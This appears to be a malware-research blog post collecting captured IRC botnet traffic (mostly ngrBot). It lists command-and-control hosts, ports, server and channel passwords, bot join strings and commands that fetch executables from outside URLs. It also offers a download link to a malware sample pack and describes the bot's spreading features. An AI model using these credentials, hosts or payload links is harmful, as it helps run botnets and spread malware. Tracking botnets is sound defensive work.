Author: Pig

Remote Host Port Number 115.239.230.73 6943 PASS laorosr 213.251.170.52 80 31.184.237.43 80 98.126.35.112 80 MODE [N00_USA_XP_1295223] @ -ix 00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR 00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X 00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 |Read more...

Remote Host Port Number 213.251.170.52 80 92.241.165.115 1863 PASS ngrBot NICK n{US|XPa}qgaqcrq USER qgaqcrq 0 0 :qgaqcrq JOIN #start romeo Now talking in #start Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ] Topic By: [ ecu ] hosting infos: http://whois.domaintools.com/92.241.164.67

Remote Host Port Number c0re.su 4443 NICK N[USA|XP][yiowryo] USER yiow “” “lol” :yiow JOIN #b0ts NICK N[USA|XP][uuobuyk] USER uuob “” “lol” :uuob NICK [USA-XP][ftlizjn] USER 2844 “” “TsGh” :2844 JOIN #botz NICK [USA-XP][qirnfam] USER 9143 “” “TsGh” :9143 NICK [n][USA-XP][ihcnykp] USER 2550 “” “TsGh” :2550 hosting infos: http://whois.domaintools.com/46.17.100.229

Remote Host Port Number 112.78.8.20 80 195.122.131.3 80 213.251.170.52 80 91.215.159.137 1866 PASS ngrBot PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s) PRIVMSG #!hot! :[d=”http://rapidshare.com/files/2997295683/nap.exe”] Error downloading file [e=”12039″] NICK n{US|XPa}aytockz USER aytockz 0 0 :aytockz JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “5” PRIVMSG #!hot! :[HTTP]: Updated HTTPRead more...

Remote Host Port Number 193.107.16.111 7654 PASS ngrBot 213.251.170.52 80 66.45.255.234 80 NICK n{US|XPa}cucqohu USER cucqohu 0 0 :cucqohu JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://gloimpsa.com/js/expressInstall.swf.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataFdxaxf.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/193.107.16.111

Remote Host Port Number tinker.weedns.com 3305 PASS secretpass Resolved : [tinker.weedns.com] To [173.9.72.212] Resolved : [tinker.weedns.com] To [222.124.178.155] Resolved : [tinker.weedns.com] To [66.238.151.86] Resolved : [tinker.weedns.com] To [188.165.200.48] Resolved : [tinker.weedns.com] To [74.210.208.163] NICK yf69xrls6 USER rb6c2qqku * 0 :USA|XP|115 JOIN #mm RSA Topic On: [ #mm ] [ +yOfS7/ZgRdB.u97R71RybXB/ubyOC/gLWja.029Cg1ae4NB/TcaF4.m9cnf/dRE2M0IU0Az0JjgIw/Pu691.6bET91ANj0U. ]

size 22mb diferent malware samples inside have fun reversing Download: http://8efc580b.tubeviral.com

Remote Host Port Number qeshmjaa.zapto.org 4244 NICK [iRooT-XP-USA]211081 USER 2110 “” “TsGh” :2110 JOIN #gan# sk NICK new[iRooT-XP-USA]709534 USER 7095 “” “TsGh” :7095 NICK [iRooT-XP-USA]664288 USER 6642 “” “TsGh” :6642 hosting infos: http://whois.domaintools.com/78.137.159.84

70.107.249.167:3921 Nick: A4-647337362958 Username: fpairedpyoqaak Joined Channel: #mss2 with Password mss2pass Channel Topic for Channel #mss2: “xvvv mssql 100 0 0 -a -r -s” i got this info from Seb another botnet lover lol hosting infos: http://whois.domaintools.com/70.107.249.167

This botnet is very big one and the bot used for spreading is also special alot of features inside like injection into multiple system processes,ruskill for killing processes blocking av updates , windows security updates, msn spread,ftp infection etc Sample vas captured by Xylitol and then i helped for finding more ip’s and diferent samplesRead more...